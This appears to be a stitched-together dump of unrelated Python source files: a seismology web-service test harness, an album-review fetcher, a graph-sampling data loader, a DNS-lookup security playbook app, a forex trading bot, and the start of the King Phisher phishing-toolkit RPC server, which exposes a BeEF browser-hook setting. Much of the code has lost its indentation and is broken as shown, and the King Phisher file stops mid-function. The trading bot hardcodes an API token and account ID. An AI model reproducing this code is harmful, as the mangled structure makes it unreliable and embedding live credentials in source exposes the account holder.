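        # connections, the service process exits, or the timeout (seconds) expires.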
print('waiting for port {} to become ready '.format(self.port),
end='')
        maxTime = datetime.now() + timedelta(seconds=timeout)
        while self.service is not None and self.service.poll() is None:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
res = sock.connect_ex(('127.0.0.1', self.port))
sock.close()
if res == 0:
print(' OK')
return True
if datetime.now() > maxTime:
print(' TIMEOUT EXCEEDED')
return False
time.sleep(0.2)
print('.', end='')
        print(' SERVICE TERMINATED')
        return False
#--------------------------------------------------------------------------
def _startService(self):
cmd = self.command()
print('starting FDSNWS service:', ' '.join(cmd))
try:
self.fdOut = open('fdsnws.stdout', 'w')
self.fdErr = open('fdsnws.stderr', 'w')
self.service = subprocess.Popen(cmd, stdout=self.fdOut,
stderr=self.fdErr)
except Exception as e:
print('failed to start FDSNWS service:', str(e))
return False
if not self._waitForSocket():
self._stopService()
return False
return True
#--------------------------------------------------------------------------
def _stopService(self, timeout=10):
if self.service.poll() is not None:
print('warning: FDSNWS service terminated ahead of time',
file=sys.stdout)
return
print('stopping FDSNWS service (PID: {}): '.format(self.service.pid),
end='')
        maxTime = datetime.now() + timedelta(seconds=timeout)
        self.service.terminate()
        while self.service.poll() is None:
print('.', end='')
time.sleep(0.2)
if datetime.now() > maxTime:
print(' TIMEOUT EXCEEDED, sending kill signal',
file=sys.stdout)
self.service.kill()
return
print(' OK')
#--------------------------------------------------------------------------
def test(self):
pass
#--------------------------------------------------------------------------
def command(self):
return [
'python', '{}/../../fdsnws.py'.format(self.rootdir),
'--debug', '--plugins=dbsqlite3,fdsnxml',
'--database=sqlite3://{}/seiscomp3.sqlite3'.format(self.rootdir),
'--serveAvailability=true', '--dataAvailability.enable=true',
'--agencyID=Test',
'--record-url=sdsarchive://{}/sds'.format(self.rootdir),
'--htpasswd={}/fdsnws.htpasswd'.format(self.rootdir)
]
#--------------------------------------------------------------------------
def diff(self, expected, got, ignoreRanges):
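        # Compare expected vs. received bytes. Each ignore range is a tuple
        # (start, end[, maxFewer[, maxMore]]) of byte offsets into the expected
        # data whose content (and, optionally, length) may differ. Returns
        # (None, None) on match, otherwise (error position, message).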
if expected == got:
return (None, None)
lenExp = minLen = maxLen = len(expected)
lenGot = len(got)
for r in ignoreRanges:
if len(r) > 2:
minLen -= r[2]
if len(r) > 3:
maxLen += r[3]
if lenGot == 0 and minLen <= 0:
return (None, None)
if lenGot < minLen or lenGot > maxLen:
return (min(lenExp,lenGot), 'read {} bytes, expected {}'.format(
lenGot, minLen if minLen == maxLen \
else '{}-{}'.format(minLen, maxLen)))
# offset between got and expected index may result from variable length
# result data, e.g. microseconds of time stamps
iGot = iExp = 0
while iExp < lenExp:
if iGot >= lenGot:
iGot = lenGot + 1
break
if got[iGot] == expected[iExp]:
iExp += 1
iGot += 1
continue
# bytes do not match, check ignore Range
ignoreRange = None
for r in ignoreRanges:
if iExp >= r[0] and iExp < r[1]:
ignoreRange = r
break
if ignoreRange:
rStart = ignoreRange[0]
rEnd = ignoreRange[1]
rLeft = rEnd - iExp
rFewer = ignoreRange[2] if len(ignoreRange) > 2 else 0
rMore = ignoreRange[3] if len(ignoreRange) > 3 else 0
varLen = rFewer + rMore
# advance expected pointer behind range
iExp = rEnd
exp = expected[iExp] if iExp < lenExp else None
# static range length: advance got pointer behind range
if varLen == 0:
iGot += rLeft
continue
                # dynamic ignore range length: search for the end of the range
                # indicated by the current exp pointer, limited by varLen
iGot += min(rLeft, rLeft - rFewer)
# expected data ends on ignore range
                if exp is None:
iGot += min(lenGot-iGot, varLen)
continue
# search range end in data
else:
pos = got[iGot:iGot+varLen+1].find(exp)
if pos >= 0:
iGot += pos
continue
return (iGot, '... [ {} ] != [ {} ] ...'.format(
got[max(0, iGot-10):min(lenGot, iGot+11)],
expected[max(0, iExp-10):min(lenExp, iExp+11)]))
if iGot < lenGot:
return (lenGot, 'read {} more bytes than expected'.format(
lenGot-iGot))
elif iGot > lenGot:
return (lenGot, 'read {} fewer bytes than expected'.format(
iGot-lenGot))
# should not happen
return (None, None)
#--------------------------------------------------------------------------
def testGET(self, url, contentType='text/html', ignoreRanges=[],
concurrent=False, retCode=200, testID=None, auth=None,
data=None, dataFile=None, diffContent=True, silent=False):
if concurrent:
self.testGETConcurrent(url, contentType, data, dataFile, retCode,
testID, ignoreRanges, auth, diffContent)
else:
self.testGETOneShot(url, contentType, data, dataFile, retCode,
testID, ignoreRanges, auth, diffContent,
silent)
#--------------------------------------------------------------------------
def testGETOneShot(self, url, contentType='text/html', data=None,
dataFile=None, retCode=200, testID=None, ignoreRanges=[],
auth=None, diffContent=True, silent=False):
if not silent:
if testID is not None:
print('#{} '.format(testID), end='')
print('{}: '.format(url), end='')
stream = False if dataFile is None else True
r = requests.get(url, stream=stream, auth=auth)
if r.status_code != retCode:
raise ValueError('Invalid status code, expected "{}", got "{}"' \
.format(retCode, r.status_code))
if contentType != r.headers['content-type']:
raise ValueError('Invalid content type, expected "{}", got "{}"' \
.format(contentType, r.headers['content-type']))
expected = None
if data is not None:
expected = py3bstr(data)
elif dataFile is not None:
with open(dataFile, 'rb') as f:
expected = f.read()
if expected is not None:
if diffContent:
errPos, errMsg = self.diff(expected, r.content, ignoreRanges)
if errPos is not None:
raise ValueError('Unexpected content at byte {}: {}'.format(
errPos, errMsg))
else:
if len(expected) != len(r.content):
raise ValueError('Unexpected content length, expected {}, '
'got {}'.format(len(expected),
len(r.content)))
if not silent:
print('OK')
sys.stdout.flush()
#--------------------------------------------------------------------------
def testGETConcurrent(self, url, contentType='text/html', data=None,
dataFile=None, retCode=200, testID=None,
ignoreRanges=[], auth=None, diffContent=True,
repetitions=1000, numThreads=10):
if testID is not None:
print('#{} '.format(testID), end='')
print('concurrent [{}/{}] {}: '.format(repetitions, numThreads, url),
end='')
sys.stdout.flush()
def doWork():
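            # Worker: keep pulling job indices until a None sentinel arrives,
            # running the one-shot GET test for each and collecting any errors.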
while True:
try:
i = q.get()
if i is None:
break
self.testGETOneShot(url, contentType, data, dataFile,
retCode, testID, ignoreRanges, auth,
diffContent, True)
print('.', end='')
sys.stdout.flush()
except ValueError as e:
errors.append("error in job #{}: {}".format(i, str(e)))
finally:
q.task_done()
# queue
q = Queue()
errors = []
# start worker threads
threads = []
for i in range(numThreads):
t = Thread(target=doWork)
t.start()
threads.append(t)
# populate queue with work
for i in range(repetitions):
q.put(i)
q.join()
# stop worker
for i in range(numThreads):
q.put(None)
for t in threads:
t.join()
if errors:
raise ValueError("{} errors occured, first one is: {}".format(
len(errors), errors[0]))
print(' OK')
sys.stdout.flush()
# vim: ts=4 et tw=79
|
reviews.py
|
"""
Fall 2017 CSc 690
File: reviews.py
Author: Steve Pedersen & Andrew Lesondak
System: OS X
Date: 12/13/2017
Usage: python3 spotify_infosuite.py
Dependencies: pyqt5, thread, pitchfork, metacritic
Description: Requester class. A thread used to search Metacritic and Pitchfork asynchronously.
"""
from reviews.pitchfork import pitchfork
from reviews.metacritic import metacritic
import threading
import json
import os
from threading import Thread
from PyQt5.QtCore import *
class Requester(QThread):
pitchfork_receiver = pyqtSignal(str)
metacritic_receiver = pyqtSignal(object)
"""
This class makes threaded requests for reviews from various sources.
It emits pyqtSignals with response objects or strings.
"""
def __init__(self):
super().__init__()
def get_metacritic_review(self, artist, album):
"""
Spawns a thread to search for a review for an album, then emits a pyqtsignal
with the review object from metacritic.Review
"""
def __get_data(arg1, arg2):
artist, album = arg1, arg2
album = self.get_formatted_album_string(album, 'metacritic')
# with open('./reviews/credentials.json') as creds:
with open(os.path.dirname(__file__) + '/credentials.json') as creds:
credentials = json.load(creds)
apikey = credentials['metacritic']['apikey']
print('Searching Metacritic for album: ', album)
m = metacritic.search(artist, album, apikey)
# if m.has_review:
self.metacritic_receiver.emit(m)
worker = threading.Thread(target=__get_data, args=[artist,album])
        worker.daemon = True
worker.start()
def get_pitchfork_review(self, artist, album):
"""
Spawns a thread to search for a review for an album, then emits a pyqtsignal
with the formatted review string.
"""
def __get_data(arg1, arg2):
artist, album = arg1, arg2
album = self.get_formatted_album_string(album)
print('Searching Pitchfork for artist/album: ', artist,' - ',album)
p = pitchfork.search(artist, album)
if p.has_review:
review = 'Pitchfork - Rating: '+str(p.score())+' - '+p.album() \
+' ('+str(p.year())+')'+'\n\n'+p.editorial() #[:800]
else:
review = p.message
self.pitchfork_receiver.emit(review)
worker = threading.Thread(target=__get_data, args=[artist,album])
        worker.daemon = True
worker.start()
def get_formatted_album_string(self, album, source=''):
"""
This is bad... meant only to be a temporary workaround to get some of my
favorite albums to work with InfoSuite.
"""
album = album.replace('(Deluxe Version)','').rstrip() \
.replace('(Remastered)','') \
.replace('Remastered','') \
.replace('[Remastered]','') \
.replace('(Deluxe Edition)','') \
.replace('(Remastered Deluxe Edition)','') \
.replace('(Non UK Version)','') \
.replace('(US Internet Release)','') \
.replace('(Special Edition)','') \
.replace('(Remastered)','') \
.replace('(Legacy Edition)','') \
.replace('(Deluxe Edition [Remastered])','') \
.replace('(U.S. Version)','') \
.replace('(1998 Remastered Version)','') \
.replace('(2011 Remastered Version)','') \
.replace('(2011 Remaster)','') \
.replace('(Deluxe)','') \
.replace('Deluxe Edition','') \
.replace('(Expanded Edition)','') \
.replace('(Remastered Original Album)','') \
.replace("(20th Anniversary Collector's Edition)",'')
if source == 'metacritic':
album = album.replace(' ', '-')
return album
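# --- Illustrative usage sketch (not part of the original module) ---
# A Requester reports results through its pyqtSignals, so a caller connects
# slots before invoking the getters; delivery assumes a running Qt event
# loop. The slot bodies, artist and album below are hypothetical placeholders,
# and the function is never invoked here.
def _example_requester_usage():
    def on_pitchfork(review_text):
        print(review_text)

    def on_metacritic(review_obj):
        print(review_obj)

    requester = Requester()
    requester.pitchfork_receiver.connect(on_pitchfork)
    requester.metacritic_receiver.connect(on_metacritic)
    requester.get_pitchfork_review('Radiohead', 'OK Computer')
    requester.get_metacritic_review('Radiohead', 'OK Computer')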
|
dataloader.py
|
import os
import sys
# set environment
#module_name ='PaGraph'
#modpath = os.path.abspath('.')
#if module_name in modpath:
# idx = modpath.find(module_name)
# modpath = modpath[:idx]
#sys.path.append(modpath)
import dgl
import torch
import numpy as np
import multiprocessing as mp
import socket
barrier_interval = 20
sample_port = 8760
class SampleLoader:
""" SampleLoader
sample load pipeline
"""
def __init__(self, graph, rank, one2all=False):
# connect to server sampler:
barrier_rank = 0 if one2all else rank
self._barrier = SampleBarrier('trainer', rank=barrier_rank)
self._graph = graph
self._rank = rank
self._port = sample_port
# set up the receiver that waits for incoming samples
self._recver = dgl.contrib.sampling.SamplerReceiver(
self._graph,
'127.0.0.1:' + str(self._port + rank),
1, # sender num
net_type='socket'
)
self._batch_num = 0
self._barrier_interval = barrier_interval
self._sampler_iter = None
def __iter__(self):
self._batch_num = 0
self._recver_iter = iter(self._recver)
return self
def __next__(self):
try:
nf = next(self._recver_iter)
except StopIteration:
# end of an epoch
self._barrier.barrier()
self._batch_num = 0
raise StopIteration
self._batch_num += 1
if self._batch_num % self._barrier_interval == 0:
self._barrier.barrier()
return nf
def __del__(self):
del self._recver
class SampleDeliver:
""" Sample Deliver
deliver sample through network
"""
def __init__(self, graph,
train_nid,
neighbor_num,
hops,
trainer_num,
sampler=None):
self._graph = graph
self._train_nid = train_nid
self._neighbor_num = neighbor_num
self._hops = hops
self._trainer_num = trainer_num
self._sender_port = sample_port
self._proc = None
self._one2all = False
self._barrier_interval = barrier_interval
self._sampler = sampler
def async_sample(self, epoch, batch_size, one2all=False):
self._one2all = one2all
if one2all:
self._proc = mp.Process(target=self.one2all_sample, args=(epoch, batch_size))
self._proc.start()
else:
if not isinstance(self._train_nid, list):
chunk_size = int(self._train_nid.shape[0] / self._trainer_num) - 1
#self._proc = mp.Pool()
self._proc = []
for rank in range(self._trainer_num):
print('starting child sampler process {}'.format(rank))
if isinstance(self._train_nid, list):
sampler_nid = self._train_nid[rank]
else:
sampler_nid = self._train_nid[chunk_size * rank:chunk_size * (rank + 1)]
#self._proc.apply_async(self.one2one_sample,
# args=(epoch, batch_size, sampler_nid, rank))
proc = mp.Process(target=self.one2one_sample,
args=(epoch, batch_size, sampler_nid, rank))
proc.start()
self._proc.append(proc)
def one2all_sample(self, epoch_num, batch_size):
"""
one sampler to all trainers with global shuffle
"""
# to be fixed: the sampler can't be loaded here unless shuffle is set to False
if self._sampler is None:
sampler = dgl.contrib.sampling.NeighborSampler(
self._graph, batch_size,
self._neighbor_num, neighbor_type='in',
shuffle=False,
num_workers=self._trainer_num * 2,
num_hops=self._hops,
seed_nodes=self._train_nid,
prefetch=True)
else: # temporary solution: load shuffled sampler outside (?)
sampler = self._sampler
# wait for trainers to connect
barrier = SampleBarrier('server', trainer_num=self._trainer_num)
namebook = {tid: '127.0.0.1:' + str(self._sender_port + tid)\
for tid in range(self._trainer_num)}
sender = dgl.contrib.sampling.SamplerSender(namebook, net_type='socket')
for epoch in range(epoch_num):
tid = 0
idx = 0
for nf in sampler:
# non-blocking send
sender.send(nf, tid % self._trainer_num)
tid += 1
if tid % self._trainer_num == 0:
idx += 1
#print('sent batch ', idx)
if idx % self._barrier_interval == 0:
barrier.barrier()
# temporary solution: makeup the unbalanced pieces
#print('Epoch {} end. Next tid: {}'.format(epoch+1, tid % self._trainer_num))
while tid % self._trainer_num != 0:
sender.send(nf, tid % self._trainer_num)
#print('Epoch {}: Makeup Sending tid: {}'.format(epoch+1, tid % self._trainer_num))
tid += 1
# end of epoch
for tid in range(self._trainer_num):
sender.signal(tid)
barrier.barrier()
def one2one_sample(self, epoch_num, batch_size, train_nid, rank):
"""
one sampler to one trainer with local shuffle
"""
# to be fixed: the sampler can't be loaded here unless shuffle is set to False
graph = self._graph[rank] if isinstance(self._graph, list) else self._graph
if self._sampler is None:
sampler = dgl.contrib.sampling.NeighborSampler(graph, batch_size,
self._neighbor_num, neighbor_type='in',
shuffle=False, num_workers=4,
num_hops=self._hops, seed_nodes=train_nid,
prefetch=True)
else: # temporary solution: load shuffled sampler outside (?)
sampler = self._sampler[rank]
# wait for the trainer to connect
barrier = SampleBarrier('server', rank=rank)
namebook = {0: '127.0.0.1:'+ str(self._sender_port + rank)}
sender = dgl.contrib.sampling.SamplerSender(namebook, net_type='socket')
for epoch in range(epoch_num):
idx = 0
for nf in sampler:
sender.send(nf, 0)
idx += 1
if idx % self._barrier_interval == 0:
barrier.barrier()
sender.signal(0)
# barrier
barrier.barrier()
def __del__(self):
if self._proc is not None:
if self._one2all:
self._proc.join()
else:
for proc in self._proc:
proc.join()
class SampleBarrier:
def __init__(self, role, trainer_num=1, rank=0):
"""
Params:
role :
'server' or 'trainer'
trainer_num:
for role == 'server'
rank :
for one2one sampling
"""
self._ip = '127.0.0.1'
self._port = 8200 + rank
self._role = role
if self._role == 'server':
print('start listening at: ' + self._ip + ' : ' + str(self._port))
self._server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._server_sock.bind((self._ip, self._port))
self._server_sock.listen(8)
self._socks = []
while trainer_num != 0:
clientsocket, addr = self._server_sock.accept()
print('received a connection. Waiting for {} more trainer connection(s)'.format(trainer_num - 1))
clientsocket.setblocking(1)
self._socks.append(clientsocket)
trainer_num -= 1
elif self._role == 'trainer':
print('[{}]: try connecting server at: '.format(rank) + self._ip + ' : ' + str(self._port))
self._socks = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socks.connect((self._ip, self._port))
self._socks.setblocking(0) # to non-blocking
print('connected to a remote sampler.')
else:
print('Unknown role')
sys.exit(-1)
def barrier(self):
if self._role == 'server':
for sock in self._socks:
_ = sock.recv(128)
else:
self._socks.send('barrier'.encode('utf-8'))
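# --- Illustrative wiring sketch (not part of the original module) ---
# One process owns a SampleDeliver and pushes NodeFlows over the network;
# each trainer builds a SampleLoader with its rank and iterates it per epoch.
# The graph, train_nid, trainer_num, epoch and batch sizes below are
# hypothetical placeholders, and the function is never called here.
def _example_pipeline(graph, train_nid, trainer_num=2, epochs=1, batch_size=512):
    deliver = SampleDeliver(graph, train_nid,
                            neighbor_num=10, hops=2,
                            trainer_num=trainer_num)
    # launch one sampler process per trainer (one2one mode)
    deliver.async_sample(epochs, batch_size, one2all=False)
    # inside each trainer process (rank in [0, trainer_num)):
    #   loader = SampleLoader(graph, rank)
    #   for epoch in range(epochs):
    #       for nf in loader:
    #           ...  # train on the received NodeFlow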
|
app.py
|
"""ThreatConnect Playbook App"""
# standard library
import json
import time
import traceback
from threading import Lock, Thread
from urllib.parse import urlparse
# third-party
import dns.exception
import dns.message
import dns.query
import dns.resolver
# first-party
from argcheck import tc_argcheck
from json_util import conform_objects, refold
from playbook_app import PlaybookApp # Import default Playbook App Class (Required)
from trap_exception import trap
TIMEOUT = 3
class Throttle:
"""Throttle Class"""
def __init__(self, rate=150):
"""Create a throttle for a specific rate/sec"""
self.lock = Lock()
self.rate = rate
self.ts = None
self.count = 0
def __call__(self):
"""Return when the throttle limit is acceptable"""
with self.lock:
now = time.time()
if self.ts is None:
self.ts = now
if now - self.ts >= 1.0:
self.count = 0
self.ts = now
self.count += 1
if self.count <= self.rate:
return
time.sleep(self.ts + 1 - now)
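# Illustrative only (not part of the original App): a Throttle instance is
# called once per operation and blocks once more than `rate` calls land in
# the same second. The rate and loop below are hypothetical placeholders;
# the function is never invoked.
def _throttle_example():
    throttle = Throttle(rate=5)
    for _ in range(20):
        throttle()  # returns immediately until 5 calls/sec is exceeded
        # ...perform the rate-limited operation here (e.g. a DNS query)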
class App(PlaybookApp):
"""Playbook App"""
def __init__(self, _tcex):
"""Initialize class properties."""
super().__init__(_tcex)
self.outputs = []
self.exit_code = 0
self.exit_message = 'Success.'
self.questions = []
self.answers = []
self.throttle = None
self.cache = dns.resolver.LRUCache()
self.nameservers = None
self.transform_ptr = True
def add_output(self, name, value, jsonify=False):
"""Add an output to the output list"""
self.outputs.append((name, value, jsonify))
@trap()
def lookup_dns(self) -> None:
"""Run the App main logic.
This method should contain the core logic of the App.
"""
questions = tc_argcheck(
self.tcex.rargs, 'questions', label='Question(s)', required=True, tcex=self.tcex
)
if not isinstance(questions, list):
questions = [questions]
record_types = tc_argcheck(self.tcex.rargs, 'record_types', required=True, tcex=self.tcex)
if not isinstance(record_types, list):
record_types = [record_types]
record_types = [x for x in record_types if x]
if not record_types:
self.fail('At least one resource record type is required.')
self.tcex.log.debug(f'Questions: {questions!r}, rrtypes {record_types!r}')
for question in questions:
if isinstance(question, dict): # must be tcentity
entity_type = question.get('type')
question = question.get('value')
if entity_type == 'EmailAddress':
if '@' not in question:
self.tcex.log.warning(f'Invalid EmailAddress {question} -- Skipped')
continue
question = question.split('@', 1)[1]
elif entity_type == 'Address':
pass
elif entity_type == 'Host':
pass
elif entity_type.upper() == 'URL':
question = urlparse(question).netloc
else:
self.tcex.log.warning(f'Unexpected indicator type {entity_type} -- Skipped')
continue
for rrtype in record_types:
self.questions.append((question, rrtype))
self.tcex.log.debug(f'Queuing {len(self.questions)} for resolution')
self.batch_resolve()
result = {}
cnames = {}
valid_questions = set()
invalid_questions = set()
for answer in self.answers:
question, cname, answers = answer
qname, rrtype = question
rrdict = result.get(qname, {})
result[qname] = rrdict
alist = rrdict.get(rrtype, [])
rrdict[rrtype] = alist
if answers:
valid_questions.add(qname)
for a in answers:
if a not in alist:
alist.append(a)
if qname not in cnames:
cnames[qname] = cname
for answer in self.answers:
question, cname, answers = answer
qname, rrtype = question
if qname not in valid_questions:
invalid_questions.add(qname)
self.add_output('dns.result.json', result, jsonify=True)
self.add_output('dns.valid', sorted(list(valid_questions)))
self.add_output('dns.invalid', sorted(list(invalid_questions)))
def fail(self, exit_message):
"""Exit with failure message, but after writing output"""
self.exit_code = 1
self.exit_message = exit_message
self.write_output()
@property
def fail_on_no_results(self):
"""Return True if fail_on_no_results is set"""
return tc_argcheck(
self.tcex.args, 'fail_on_no_results', types=bool, default=False, tcex=self.tcex
)
def handle_exception(self, e):
"""Handle exceptions raised during any trap() decorated method"""
exit_message = str(e)
if ' ' not in exit_message:
exit_message = repr(e)
self.tcex.log.error(repr(e))
self.tcex.log.error(traceback.format_exc())
self.fail(exit_message)
def setup(self):
"""Perform prep/startup operations."""
self.nameservers = tc_argcheck(
self.tcex.rargs, 'dns_servers', label='DNS Servers', required=True, tcex=self.tcex
)
rate_limit = tc_argcheck(
self.tcex.rargs, 'rate_limit', required=True, types=int, default=150, tcex=self.tcex
)
self.throttle = Throttle(rate_limit)
self.transform_ptr = tc_argcheck(
self.tcex.rargs, 'transform_ptr', default=True, types=bool, tcex=self.tcex
)
if isinstance(self.nameservers, str):
self.nameservers = self.nameservers.split(',')
if not isinstance(self.nameservers, list):
self.nameservers = [self.nameservers]
self.nameservers = [x.strip() for x in self.nameservers]
self.add_output('dns.action', self.tcex.rargs.tc_action)
def write_one(self, name, value):
"""Write one output"""
if isinstance(value, list):
kind = 'StringArray'
else:
kind = 'String'
if not isinstance(value, (list, dict, int, str, bool, float)) and value is not None:
value = repr(value)
self.tcex.playbook.create_output(name, value, kind)
def write_output(self) -> None:
"""Write the Playbook output variables."""
for prefix, value, jsonify in self.outputs:
if callable(value):
try:
value = value() # deferred action output
except Exception:
self.tcex.log.error(
f'Exception raised during output handling for {prefix}, '
'writing null output'
)
value = None
if jsonify and isinstance(value, (list, dict)):
value = json.dumps(value)
self.tcex.log.debug(f'JSONifying output {prefix}')
if isinstance(value, (list, dict)):
value = conform_objects(value)
value = refold(value, prefix=prefix)
for name, inner_value in value.items():
self.write_one(name, inner_value)
else:
self.write_one(prefix, value)
self.tcex.playbook.exit(self.exit_code, self.exit_message)
def batch_resolve(self, count=4):
"""Fire up count resolver threads, then join on them"""
threads = []
for n in range(count):
threads.append(
Thread(group=None, target=self.resolver_thread, name=f'Resolver-{n+1}', daemon=True)
)
for thread in threads:
self.tcex.log.debug(f'Starting Resolver {thread.name}')
thread.start()
for thread in threads:
self.tcex.log.debug(f'Joining Resolver {thread.name}')
thread.join()
def resolver_thread(self):
"""Resolver Thread to handle DNS lookups"""
self.tcex.log.debug(f'Resolver starting... {len(self.questions)} questions remaining...')
try:
resolver = dns.resolver.Resolver(configure=False)
resolver.nameservers = self.nameservers
resolver.timeout = TIMEOUT
resolver.cache = self.cache
except Exception as e:
self.tcex.log.error(f'Failed to create resolver: {e}')
self.tcex.log.error(traceback.format_exc())
while self.questions:
question = self.questions.pop()
self.throttle()
self.tcex.log.debug(f'Question: {question}')
answer = self.resolve(question, resolver)
cname = None
if answer:
result = []
for rdata in answer:
data = rdata.to_text()
if data.endswith('.'):
data = data[:-1]
result.append(data)
cname = str(answer.canonical_name)
if cname.endswith('.'): # it will!
cname = cname[:-1]
answer = result
self.tcex.log.debug(f'Answer: {question} ({cname})= {answer}')
self.answers.append((question, cname, answer))
def resolve(self, question, resolver):
"""Resolve ONE question, in the form of (name, rrtype)"""
name, rrtype = question
try:
if rrtype == 'PTR' and self.transform_ptr:
answer = resolver.resolve_address(name, lifetime=3, search=False)
else:
answer = resolver.resolve(name, rrtype, lifetime=3, search=False)
return answer
except dns.exception.Timeout:
self.tcex.log.debug(f'Timeout resolving {name} {rrtype}')
except dns.resolver.NXDOMAIN:
self.tcex.log.debug(f'NXDOMAIN resolving {name} {rrtype}')
except dns.resolver.YXDOMAIN:
self.tcex.log.debug(f'YXDOMAIN resolving {name} {rrtype}')
except dns.resolver.NoAnswer:
self.tcex.log.debug(f'No answer resolving {name} {rrtype}')
except dns.resolver.NoNameservers:
self.tcex.log.debug(f'No nameservers resolving {name} {rrtype}')
except Exception as e:
self.tcex.log.error(f'Error resolving question: {e}')
self.tcex.log.error(traceback.format_exc())
return None
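# --- Standalone sketch of the dnspython calls used above (illustrative) ---
# Mirrors the resolver setup in resolver_thread() and the lookup in resolve()
# without the tcex plumbing. The default name, record type and nameserver are
# hypothetical placeholders; the function is never invoked by the App.
def _example_resolve(name='example.com', rrtype='A', nameserver='8.8.8.8'):
    resolver = dns.resolver.Resolver(configure=False)
    resolver.nameservers = [nameserver]
    resolver.timeout = TIMEOUT
    try:
        answer = resolver.resolve(name, rrtype, lifetime=TIMEOUT, search=False)
    except (dns.exception.Timeout, dns.resolver.NXDOMAIN, dns.resolver.NoAnswer):
        return None
    return [rdata.to_text().rstrip('.') for rdata in answer]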
|
bot.py
|
from trade_client import TradeClient
from trading import TradeORB
from log_wrapper import LogWrapper
import threading
#practice account so no security threat
accountID = '101-001-19034598-001'
token = '06e811dacdba86915a05a7031c744136-94a79c4cfede80f7362248aa069e8214'
# creating oanda client object
trade_client = TradeClient(accountID, token)
# EURO USD trading object
trade_EUR_USD = TradeORB(trade_client, "EUR_USD")
# AUS CAD (Australian Dollar-Canadian Dollar) trading object
trade_AUD_CAD = TradeORB(trade_client, "AUD_CAD")
# EUR JPY trading object
trade_EUR_JPY = TradeORB(trade_client, "EUR_JPY")
def start_trading(trading_obj):
# infinite loop over buy sell method
while True:
trading_obj.buy_sell_ORB()
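# --- Illustrative alternative launcher (not part of the original script) ---
# start_trading() loops forever, so the non-daemon threads started in the
# __main__ block below keep the process alive after its final print. The
# variant here also joins the workers explicitly; it is defined but never
# called.
def run_all(trading_objs):
    threads = [threading.Thread(target=start_trading, args=(obj,)) for obj in trading_objs]
    for t in threads:
        t.start()
    print("Trading BOT Running.....")
    for t in threads:
        t.join()  # block the main thread while the workers trade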
if __name__ == '__main__':
# creating thread for each object type
t1 = threading.Thread(target=start_trading, args=(trade_EUR_USD,))
t2 = threading.Thread(target=start_trading, args=(trade_AUD_CAD,))
t3 = threading.Thread(target=start_trading, args=(trade_EUR_JPY,))
# starting thread 1
t1.start()
# starting thread 2
t2.start()
# starting thread 3
t3.start()
# main thread continues immediately; the worker threads keep trading
print("Trading BOT Running.....")
|
server_rpc.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/server/server_rpc.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import collections
import datetime
import functools
import logging
import threading
from king_phisher import errors
from king_phisher import geoip
from king_phisher import ipaddress
from king_phisher import version
from king_phisher.constants import ConnectionErrorReason
from king_phisher.server import signals
from king_phisher.server.database import manager as db_manager
from king_phisher.server.database import models as db_models
from king_phisher.server.graphql import schema
import advancedhttpserver
import pyotp
CONFIG_READABLE = (
'beef.hook_url',
'server.addresses',
'server.cookie_name',
'server.require_id',
'server.rest_api.enabled',
'server.secret_id',
'server.tracking_image',
'server.vhost_directories',
'server.web_root'
)
"""Configuration options that can be accessed by the client."""
CONFIG_WRITEABLE = ('beef.hook_url',)
"""Configuration options that can be changed by the client at run time."""
RPC_AUTH_HEADER = 'X-RPC-Auth'
"""The header which contains the RPC authorization / session token."""
VIEW_ROW_COUNT = 50
"""The default number of rows to return when one of the /view methods are called."""
database_tables = db_models.database_tables
graphql_schema = schema.Schema()
rpc_logger = logging.getLogger('KingPhisher.Server.RPC')
def register_rpc(path, database_access=False, log_call=False):
"""
Register an RPC function with the HTTP request handler. This allows the
method to be remotely invoked using King Phisher's standard RPC interface.
If *database_access* is specified, a SQLAlchemy session will be passed as
the second argument, after the standard
:py:class:`~advancedhttpserver.RequestHandler` instance.
:param str path: The path for the RPC function.
:param bool database_access: Whether or not the function requires database access.
:param bool log_call: Whether or not to log the arguments which the function is called with.
"""
path = '^' + path + '$'
def decorator(function):
@functools.wraps(function)
def wrapper(handler_instance, *args, **kwargs):
if log_call and rpc_logger.isEnabledFor(logging.DEBUG):
args_repr = ', '.join(map(repr, args))
if kwargs:
for key, value in sorted(kwargs.items()):
args_repr += ", {0}={1!r}".format(key, value)
msg = "calling RPC method {0}({1})".format(function.__name__, args_repr)
rpc_logger.debug(msg)
signals.send_safe('rpc-method-call', rpc_logger, path[1:-1], request_handler=handler_instance, args=args, kwargs=kwargs)
if database_access:
session = db_manager.Session()
try:
result = function(handler_instance, session, *args, **kwargs)
finally:
session.close()
else:
result = function(handler_instance, *args, **kwargs)
signals.send_safe('rpc-method-called', rpc_logger, path[1:-1], request_handler=handler_instance, args=args, kwargs=kwargs, retval=result)
return result
advancedhttpserver.RegisterPath(path, is_rpc=True)(wrapper)
return wrapper
return decorator
@register_rpc('/ping', log_call=True)
def rpc_ping(handler):
"""
An RPC method that can be used by clients to assert the status
and responsiveness of this server.
:return: This method always returns True.
:rtype: bool
"""
return True
@register_rpc('/shutdown', log_call=True)
def rpc_shutdown(handler):
"""
